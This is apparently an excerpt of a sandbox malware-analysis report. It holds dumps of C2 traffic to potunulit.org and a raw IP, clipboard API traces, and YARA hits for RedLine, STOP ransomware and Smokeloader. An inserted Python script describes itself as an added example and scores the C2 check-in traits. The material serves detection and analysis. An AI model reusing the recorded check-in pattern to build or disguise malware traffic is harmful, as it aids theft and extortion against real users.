46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uc9nXYF1fmW%2Bagssg3q%2BTFkHnGyG6xXPS%2Bu1VDdcQ7JP4CYuoLuwjAjY%2BoX0XADjyHIyL4EBCfE06sNSpp3Rd7QKWR9Oh5YPP0ukKVvyqIB4UrTBLysCpLCWDyuk5gXX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa29c3c5a9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6PedILqYb%2BwMtD2wBJm4ZxSuts3E7I0IwDbY5uPogmztKqFme4lJUWm3V74LUK2NlCZg5kCtcGIso%2B9MH%2FLhwKrANT9xqhHSvRoMjv5D1b3CuqLAkDNGMDntXlxckE78"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa29e1f8d9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jXA5e%2BFvXglUebSfydu1jGbAZaIN%2BEwesa3yQEBLrRnFGEadxsba8zsO1UquRqdjFm%2FQj3ypTAY%2FFfs9%2BEd83%2FHbDO%2Fnv0rXAEZ45COzU0JhoH7B5cl2z2GopIkweeQ%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa29faa3f9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9mT70NdXjnFVYbDGiWKoYAvHVqm3cQYT48fLG6X8Ock5ML5BUUeBtUhxIcO4HdX%2BdqDpJuQgc9VRZqSxm7hLShTLeGbUo1oEgiEOx5R4pwhSR4k3uAQ%2BnwuuV86kkV3r"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2a0dc119b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryjphgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49737 version: TLS 1.2
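The records above show the C2 shape worth alerting on: a form-encoded POST to the bare path / on potunulit.org carrying a Referer for an unrelated host (ryjphgb.com), an IE11-style User-Agent, and Cloudflare-fronted 404 replies whose chunked bodies begin with raw bytes rather than the Apache error page, alongside a GET /geo.json to api.2ip.ua with the literal User-Agent "Microsoft Internet Explorer". The following Python is an added triage example, not part of the Joe Sandbox report or its tooling; its request and response samples are constructed to match those records, and the trait names and the 30% non-printable threshold are this example's own choices.

```python
"""Triage of the HTTP records above (added example; not part of the Joe
Sandbox report or its tooling). The samples below are CONSTRUCTED to match
the shape of the report's POST / check-in to potunulit.org, the GET /geo.json
to api.2ip.ua, and the Cloudflare 404 replies whose first chunk was not HTML.
Trait names and the 30% non-printable threshold are this example's own."""
from urllib.parse import urlsplit


def chunk(payload: bytes) -> bytes:
    """Encode one chunk plus the terminating zero chunk (Transfer-Encoding: chunked)."""
    return f"{len(payload):x}".encode() + b"\r\n" + payload + b"\r\n0\r\n\r\n"


# --- constructed samples, modelled on the report's records ----------------
REQ_POST = (
    b"POST / HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
    b"Referer: http://ryjphgb.com/\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    b"Content-Length: 164\r\nHost: potunulit.org\r\n\r\n" + b"A" * 164
)
REQ_GEO = b"GET /geo.json HTTP/1.1\r\nUser-Agent: Microsoft Internet Explorer\r\nHost: api.2ip.ua\r\n\r\n"
RESP_HDR = (b"HTTP/1.1 404 Not Found\r\nContent-Type: text/html; charset=utf-8\r\n"
            b"Transfer-Encoding: chunked\r\nServer: cloudflare\r\n\r\n")
# first 16 bytes of the opaque body seen in the report, then the zero chunk
RESP_BLOB = RESP_HDR + chunk(bytes.fromhex("0000b460fbd40e1a4010163080b72c78"))
RESP_HTML = RESP_HDR + chunk(b"<html><body><h1>Not Found</h1></body></html>")


def parse_message(raw: bytes):
    """Split an HTTP/1.1 message into start line, lower-cased header dict and raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def dechunk(body: bytes) -> bytes:
    """Decode a chunked body; stops at the zero-length chunk."""
    out, pos = b"", 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return out
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                         # skip data and its CRLF


def decoded_body(raw: bytes) -> bytes:
    _, headers, body = parse_message(raw)
    if "chunked" in headers.get("transfer-encoding", "").lower():
        return dechunk(body)
    return body


def nonprintable_ratio(data: bytes) -> float:
    if not data:
        return 0.0
    printable = sum(1 for b in data if b in (9, 10, 13) or 32 <= b <= 126)
    return 1 - printable / len(data)


def score_request(raw: bytes) -> list:
    """Return the loader check-in traits a request exhibits."""
    start, h, _ = parse_message(raw)
    method, path, _ = start.split(" ", 2)
    hits = []
    if method == "POST" and path == "/" and "x-www-form-urlencoded" in h.get("content-type", ""):
        hits.append("form POST to bare / (loader check-in shape)")
    ref_host = urlsplit(h.get("referer", "")).hostname
    host = h.get("host", "").split(":")[0]
    if ref_host and ref_host != host:
        hits.append(f"Referer host {ref_host} does not match Host {host}")
    ua = h.get("user-agent", "")
    if "Trident/7.0" in ua and "rv:11.0" in ua:
        hits.append("IE11-style User-Agent on a non-browser flow (weak)")
    if ua.strip() in ("", "Microsoft Internet Explorer"):
        hits.append("bare or missing User-Agent")
    return hits


def score_response(raw: bytes) -> list:
    """Flag 404 replies that carry something other than an HTML error page."""
    start, h, _ = parse_message(raw)
    status = start.split(" ")[1]
    body = decoded_body(raw)
    hits = []
    if "text/html" in h.get("content-type", "") and body and not body.lstrip().startswith(b"<"):
        hits.append(f"{status} declares text/html but body is not markup")
    ratio = nonprintable_ratio(body)
    if ratio > 0.30:
        hits.append(f"opaque body ({ratio:.0%} non-printable) in a {status} reply")
    return hits


if __name__ == "__main__":
    for label, raw, fn in (("POST /", REQ_POST, score_request), ("GET /geo.json", REQ_GEO, score_request),
                           ("404 blob", RESP_BLOB, score_response), ("404 html", RESP_HTML, score_response)):
        print(label, "->", fn(raw) or "clean")
```

The point of decoding the chunked body before scoring is that the report's two kinds of 404 look identical at the header level (same Cloudflare headers, same Content-Type); only the first bytes of the body separate the Apache error page from the loader's opaque reply, and the Referer/Host mismatch is what turns a generic form POST into a check-in worth a ticket.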

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fontview.exe PID: 4772, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 6_2_00402830
Source: file.exe, 00000000.00000002.397065443.0000000000798000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: GetRawInputData

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match File source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR

System Summary

Source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DCE1 0_2_0040DCE1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C2AD 0_2_0040C2AD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BD69 0_2_0040BD69
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C7F1 0_2_0040C7F1
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004041D0 6_2_004041D0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00411470 6_2_00411470
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004010E0 6_2_004010E0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00406150 6_2_00406150
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004021D0 6_2_004021D0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0042429D 6_2_0042429D
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0042C5FE 6_2_0042C5FE
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0040D600 6_2_0040D600
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004266B9 6_2_004266B9
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00402830 6_2_00402830
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0040C9A0 6_2_0040C9A0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00419A6E 6_2_00419A6E
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0041CAF0 6_2_0041CAF0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00409B10 6_2_00409B10
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0042AB9A 6_2_0042AB9A
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0040CC40 6_2_0040CC40
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00401D90 6_2_00401D90
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0040CE90 6_2_0040CE90
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00421F48 6_2_00421F48
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040DCE1 7_2_0040DCE1
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040BD69 7_2_0040BD69
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040CEE9 7_2_0040CEE9
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040C2AD 7_2_0040C2AD
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_00404BDB 7_2_00404BDB
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040C7F1 7_2_0040C7F1
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_00406793 7_2_00406793
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\43D0.exe F55976607594D241004245F084ADD64F399F7D4683C603F56EF92C0CBCD41E05
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
